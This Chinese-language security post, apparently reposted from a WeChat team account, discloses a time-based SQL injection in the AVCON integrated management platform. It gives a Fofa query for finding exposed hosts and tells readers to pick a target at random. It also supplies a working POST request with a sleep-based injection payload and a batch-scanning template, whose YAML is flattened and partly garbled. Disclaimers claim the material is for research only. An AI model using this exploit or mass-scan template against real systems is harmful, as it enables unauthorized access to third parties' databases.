漏洞描述
AVCON综合管理平台可以实现各种子系统图像集成管理和音视频交互操作,将图像传输、视频监控、指挥调度、视频会议等系统融合,AVCON综合管理平台avcon.action存在时间注入漏洞。
漏洞复现
步骤一:在Fofa中搜索以下语法并随机确定要进行攻击测试的目标....
#Fofa搜索语法title="AVCON-系统管理平台" || "/avcon.action"
步骤二:开启代理并打开BP对其user.php进行抓包拦截....修改请求头、请求体内容....执行poc进行SQL时间注入,得到回显
POST /avcon.action HTTP/1.1Host: ipUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 77name=0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z&password=u]H[ww6KrA9F.x-F
批量脚本
id: avcon-xtgl-name-sqliinfo:name: avcon-xtgl-name-sqli: xingyunseverity: highdescription: AVCON综合管理平台可以实现各种子系统图像集成管理和音视频交互操作,将图像传输、视频监控、指挥调度、视频会议等系统融合,AVCON综合管理平台avcon.action存在时间注入漏洞。tags: avcon,sqlimetadata:: title="AVCON-系统管理平台"veified: true: 1http:raw:|POST /avcon.action HTTP/1.1: application/x-www-form-urlencoded: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)Host:name=0'XOR({{mysql}})XOR'Z&password=u]H[ww6KrA9F.x-Fpayloads:mysql:"if(now()=sysdate()%2Csleep(6)%2C0)"matchers:type: dslname: mysqldsl:"status_code_1 == 200 && duration>=5 && duration<=8 && contains(body,'登录失败,请查询您的信息输入是否正确') && contains(header,'text/plain')"
揽月安全团队发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!!!!!
原文始发于微信公众号(揽月安全团队):avcon综合管理平台存在SQL注入漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论